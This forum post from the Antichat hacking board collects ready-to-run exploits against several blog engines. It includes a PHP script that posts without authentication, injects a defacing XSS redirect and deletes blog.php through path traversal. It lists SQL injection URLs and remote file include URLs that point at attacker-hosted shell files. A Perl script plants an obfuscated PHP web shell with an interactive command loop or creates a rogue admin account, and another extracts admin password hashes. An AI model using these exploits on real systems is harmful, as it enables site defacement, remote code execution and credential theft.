|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Light Blog Multiple Vulnerabilities
PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Light Blog Multiple Vulnerabilities Exploit\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host: target server (ip/hostname)\r\n";
echo "Path: path to LightBlog\r\n";
echo "AttackType: 1 - Create New Post (Title must be of one word)\r\n";
echo " |-> Related: Title Post\r\n";
echo " |-> Es: php ".$argv[0]." localhost /blog/ 1 Hacked I Got You\r\n\r\n";
echo " 2 - Deface Blog (With XSS)\r\n";
echo " |-> Related: WebPage\r\n";
echo " |-> Es: php ".$argv[0]." localhost /blog/ 2 http://site.com/\r\n\r\n";
echo " 3 - Deface Blog (Deleting blog.php)\r\n";
echo " |-> Related: NickName\r\n";
echo " |-> Es: php ".$argv[0]." localhost /blog/ 3 BlackHawk\r\n\r\n";
echo "";
echo "\r\n";
echo "";
die;
}
/*
There are some critical vulnerabilities in this quite simple Blog Engine..
1 - You do not need to know the right password to send a new Post (no cecking);
2 - You can erase (even with mq=on) all file that are stored on the server:
[...]
$t = stripslashes($t);
[...]
$fc = fopen ("blog_comments/$t.txt", "w");
fwrite ($fc, "");
[...]
3-Using point No 1 you can do some XSS couse there isn't any anti-Xss code for admins
4-If mq=on than you can deface the site (but no injecting PHP cause < and > are properly parsed)
sorry for my bad english,
BlackHawk hawkgotyou@gmail.com
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
switch($attack_type)
{
case 1: //Insert New Post
$title=$argv[4];
$message="";
for ($i=5; $i<=$argc-1; $i++){
$message.=" ".$argv[$i];
}
$title=urlencode($title);
$message=urlencode($message);
echo "Attack No 1 - Sending New Post..\r\n";
$data="t=$title";
$data.="&c=$message";
$data.="&Submit=Post";
$packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "Ok, Post Sent";
break;
case 2: // Deface With XSS
$dfc_url=$argv[4];
$deface_url=urlencode("<script>window.location=('$dfc_url')</script>");
echo "Attack No 2 - Sending New Post With XSS..\r\n";
$data="t=$deface_url";
$data.="&c=msg";
$data.="&Submit=Post";
$packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "Ok, Post Sent";
break;
break;
case 3: // Defacing the original blog.php file
$nickname=$argv[4];
$packet ="GET ".$p."LightBlog/blog_comments.php?comment=Comment&title=title HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("name=\"rand\" id=\"rand\" value=\"",$html);
$temp2=explode("\"></input>",$temp[1]);
$random_code = $temp2[0];
$temp=explode("name=\"rand\" id=\"rand\" value=\"$random_code\"></input>",$html);
$temp2=explode(" ",$temp[1]);
$small_code = $temp2[0];
$data="t=../../blog.php%00";
$data.="&c=ciao";
$data.="&Submit=Post";
$packet="POST ".$p."/LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
echo "blog.php File erased\r\n";
// This part will work only if mq=off elsewhere the exploit will only delete blog.php
$deface_text=urlencode("|:. $nickname got you! .:");
$signature=urlencode(" BlackHawk And Piggy-Marty Rulez info --> <hawkgotyou@gmail.com>");
$packet ="GET ".$p."LightBlog/add_comment_script.php?name=$deface_text&comment=$signature&rand=$random_code&val=$small_code&Submit=Submit&title=../../blog.php/%00 HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Ok, Blog Defaced";
break;
}
?>
# milw0rm.com [2006-10-27]
Def-Blog <= v1.0.1 SQL Injection
USER : comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
PASS : comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
OpenDock Easy Blog <=1.4 File Include
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?
A-Blog v2.0 Remote File Include
http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?
Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin
PHP код:
#!/usr/bin/perl
#
# Affected.scr..: Blog Pixel Motion V2.1.1
# Poc.ID........: 12060927
# Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode)
# Risk.level....: High
# Vendor.Status.: Unpatched
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip
# Poc.link......: acid-root.new.fr/poc/12060927.txt
# Credits.......: DarkFig
#
# print "This exploit is for educational purpose only" x 999; exit;
#
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
use Getopt::Long;
use strict;
print STDOUT "\n+", '-' x 60, "+\n";
print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n";
print STDOUT '+', '-' x 60, "+\n";
my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res,$re);
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp,
'choice=s' => \$choice);
if(!$host) {
print STDOUT "| Usage: ./zz.pl --host=[www] --path=[/] --choice=[0] |\n";
print STDOUT "| [Choice.] 1=PHP_Code_Execution 2=Create_Admin |\n";
print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
print STDOUT '+', '-' x 60, "+\a\n";
exit(1);
}
if($host !~ /http/) {$host = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}
if(!$path) {$path = '/';}
if(!$choice) {$choice = 2;}
my $ua = LWP::UserAgent->new();
$ua->agent('0xzilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;
$re->proxy_authorization_basic($proxu, $proxp) if $proxp;
if($choice == 1) {
$re = POST $host.$path.'config.php', [
'nom_blog' => '";
$shcode = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65);
$shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
$shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
$shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74);
$shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69);
$shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65);
$shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);
$shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);
$shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A);
eval($shcode); die(); //'];
$ua->request($re);
while(<STDIN>){
chomp($cmd = $_);
if($cmd eq 'exit') { exit(0); }
$re = GET $host.$path.'include/variables.php?cmd='.$cmd;
$res = $ua->request($re);
print STDOUT "\n\n".$res->content."\n\$sh: ";
}
} else {
$re = GET $host.$path.'insere_base.php?login=woot&pass=t00w';
$ua->request($re);
print STDOUT "[+] Admin login.: woot\n";
print STDOUT "[+] Admin passwd: t00w\n";
print STDOUT '+', '-' x 60, "+\n";
}
# milw0rm.com [2006-09-27]
A-Blog V2 Remote File Include
Код:
http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?
Spidey Blog Script <= 1.5 SQL Injection
PHP код:
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0);
}
else
{
if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); }
else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1);
}
}
#To Be Or Not To Be!
# milw0rm.com [2006-09-24]
|